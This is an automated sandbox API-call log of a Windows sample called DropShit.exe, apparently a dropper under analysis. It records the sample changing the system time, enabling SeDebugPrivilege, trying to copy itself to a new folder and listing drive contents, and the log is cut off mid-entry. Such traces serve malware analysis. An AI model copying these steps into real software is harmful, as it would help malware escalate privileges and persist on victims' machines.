# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: Jul 9 2019 16:03:52 # Log Creation Date: 16.07.2019 08:39:06.561 Process: id = "1" image_name = "dropshit.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe" page_root = "0x4da2d000" os_pid = "0xa44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xa48 [0032.784] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0033.871] GetLogicalDrives () returned 0x4 [0033.875] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16dff0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0033.878] GetCurrentProcess () returned 0xffffffffffffffff [0033.879] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16e5f8 | out: TokenHandle=0x16e5f8*=0x1bc) returned 1 [0033.881] GetCurrentProcess () returned 0xffffffffffffffff [0033.881] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16e608 | out: TokenHandle=0x16e608*=0x1c0) returned 1 [0033.888] GetTokenInformation (in: TokenHandle=0x1bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16e658 | out: TokenInformation=0x0, ReturnLength=0x16e658) returned 0 [0033.889] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1a5a5c20 [0033.889] GetTokenInformation (in: TokenHandle=0x1bc, TokenInformationClass=0x1, TokenInformation=0x1a5a5c20, TokenInformationLength=0x2c, ReturnLength=0x16e658 | out: TokenInformation=0x1a5a5c20, ReturnLength=0x16e658) returned 1 [0033.890] LocalFree (hMem=0x1a5a5c20) returned 0x0 [0033.892] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x16e4c8, DesiredAccess=0x800, PolicyHandle=0x16e438 | out: PolicyHandle=0x16e438) returned 0x0 [0033.894] LsaLookupSids (in: PolicyHandle=0x1a5a5c20, Count=0x1, Sids=0x2119940*=0x2119838*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x16e4b0, Names=0x16e498 | out: ReferencedDomains=0x16e4b0, Names=0x16e498) returned 0x0 [0033.896] LsaClose (ObjectHandle=0x1a5a5c20) returned 0x0 [0033.896] LsaFreeMemory (Buffer=0x1a596aa0) returned 0x0 [0033.896] LsaFreeMemory (Buffer=0x4bfc10) returned 0x0 [0034.593] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1a59c410 [0034.593] LocalAlloc (uFlags=0x0, uBytes=0x56) returned 0x4bfc10 [0040.587] LocalFree (hMem=0x1a59c3f0) returned 0x0 [0040.587] LocalFree (hMem=0x1a59c410) returned 0x0 [0040.587] LocalFree (hMem=0x4bfc10) returned 0x0 [0040.590] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1a59c410 [0040.590] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1a59c3f0 [0040.590] LocalAlloc (uFlags=0x0, uBytes=0x3e) returned 0x1a5cac60 [0040.641] LocalFree (hMem=0x1a59c410) returned 0x0 [0040.641] LocalFree (hMem=0x1a59c3f0) returned 0x0 [0040.641] LocalFree (hMem=0x1a5cac60) returned 0x0 [0040.641] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1a59c3f0 [0040.641] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1a59c410 [0040.641] LocalAlloc (uFlags=0x0, uBytes=0x62) returned 0x1a5d2520 [0041.546] LocalFree (hMem=0x1a59c3f0) returned 0x0 [0041.546] LocalFree (hMem=0x1a59c410) returned 0x0 [0041.546] LocalFree (hMem=0x1a5d2520) returned 0x0 [0041.546] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1a59c410 [0041.546] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1a59c3f0 [0041.546] LocalAlloc (uFlags=0x0, uBytes=0x82) returned 0x1a5aaca0 [0041.683] LocalFree (hMem=0x1a59c410) returned 0x0 [0041.683] LocalFree (hMem=0x1a59c3f0) returned 0x0 [0041.683] LocalFree (hMem=0x1a5aaca0) returned 0x0 [0041.699] SetSystemTime (lpSystemTime=0x16e748*(wYear=0x7a3, wMonth=0x3, wDayOfWeek=0x0, wDay=0x10, wHour=0xa, wMinute=0x0, wSecond=0x0, wMilliseconds=0x0)) returned 1 [0041.733] GetCurrentProcessId () returned 0xa44 [0041.740] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16d710 | out: lpLuid=0x16d710*(LowPart=0x14, HighPart=0)) returned 1 [0041.751] GetCurrentProcess () returned 0xffffffffffffffff [0041.752] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16d708 | out: TokenHandle=0x16d708*=0x3c0) returned 1 [0041.752] AdjustTokenPrivileges (in: TokenHandle=0x3c0, DisableAllPrivileges=0, NewState=0x21200a0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0041.752] CloseHandle (hObject=0x3c0) returned 1 [0041.753] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa44) returned 0x3c0 [0041.758] EnumProcessModules (in: hProcess=0x3c0, lphModule=0x2120108, cb=0x200, lpcbNeeded=0x16e6a0 | out: lphModule=0x2120108, lpcbNeeded=0x16e6a0) returned 1 [0041.759] GetModuleInformation (in: hProcess=0x3c0, hModule=0x2a0000, lpmodinfo=0x2120378, cb=0x18 | out: lpmodinfo=0x2120378*(lpBaseOfDll=0x2a0000, SizeOfImage=0x10000, EntryPoint=0x2aa87e)) returned 1 [0041.760] CoTaskMemAlloc (cb=0x804) returned 0x1a61d0f0 [0041.760] GetModuleBaseNameW (in: hProcess=0x3c0, hModule=0x2a0000, lpBaseName=0x1a61d0f0, nSize=0x800 | out: lpBaseName="DropShit.exe") returned 0xc [0041.761] CoTaskMemFree (pv=0x1a61d0f0) [0041.761] CoTaskMemAlloc (cb=0x804) returned 0x1a61d0f0 [0041.761] GetModuleFileNameExW (in: hProcess=0x3c0, hModule=0x2a0000, lpFilename=0x1a61d0f0, nSize=0x800 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x32 [0041.762] CoTaskMemFree (pv=0x1a61d0f0) [0041.762] CloseHandle (hObject=0x3c0) returned 1 [0041.765] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16e190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.767] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", nBufferLength=0x105, lpBuffer=0x16e190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x0) returned 0x32 [0041.767] GetFullPathNameW (in: lpFileName="C:\\sdfudf\\DropShit.exe", nBufferLength=0x105, lpBuffer=0x16e190, lpFilePart=0x0 | out: lpBuffer="C:\\sdfudf\\DropShit.exe", lpFilePart=0x0) returned 0x16 [0041.767] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe"), lpNewFileName="C:\\sdfudf\\DropShit.exe" (normalized: "c:\\sdfudf\\dropshit.exe"), bFailIfExists=1) returned 0 [0041.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0041.769] CloseHandle (hObject=0x3c0) returned 1 [0041.779] EtwEventRegister (in: ProviderId=0x2125450, EnableCallback=0x1aeb131c, CallbackContext=0x0, RegHandle=0x2125430 | out: RegHandle=0x2125430) returned 0x0 [0042.171] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16e190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0046.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16e4f0) returned 1 [0047.474] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0047.475] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16df80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0047.477] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x16e190 | out: lpFindFileData=0x16e190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x1a5dde50 [0047.479] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0047.479] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0047.479] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0047.479] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0047.480] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0047.480] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0047.480] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0047.480] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0047.480] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0047.480] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf8a283e0, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf8a283e0, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0047.480] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0047.481] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0047.481] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0047.481] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0047.481] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0047.481] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0047.481] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0047.481] FindClose (in: hFindFile=0x1a5dde50 | out: hFindFile=0x1a5dde50) returned 1 [0047.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16e440) returned 1 [0047.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16e400) returned 1 [0047.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16e4f0) returned 1 [0047.482] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0047.482] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16df80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0047.482] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x16e190 | out: lpFindFileData=0x16e190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x1a5dde50 [0047.482] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0047.482] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0047.483] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0047.483] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0047.483] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0047.483] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0047.483] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0047.483] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0047.483] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0047.483] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf8a283e0, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf8a283e0, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0047.484] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, 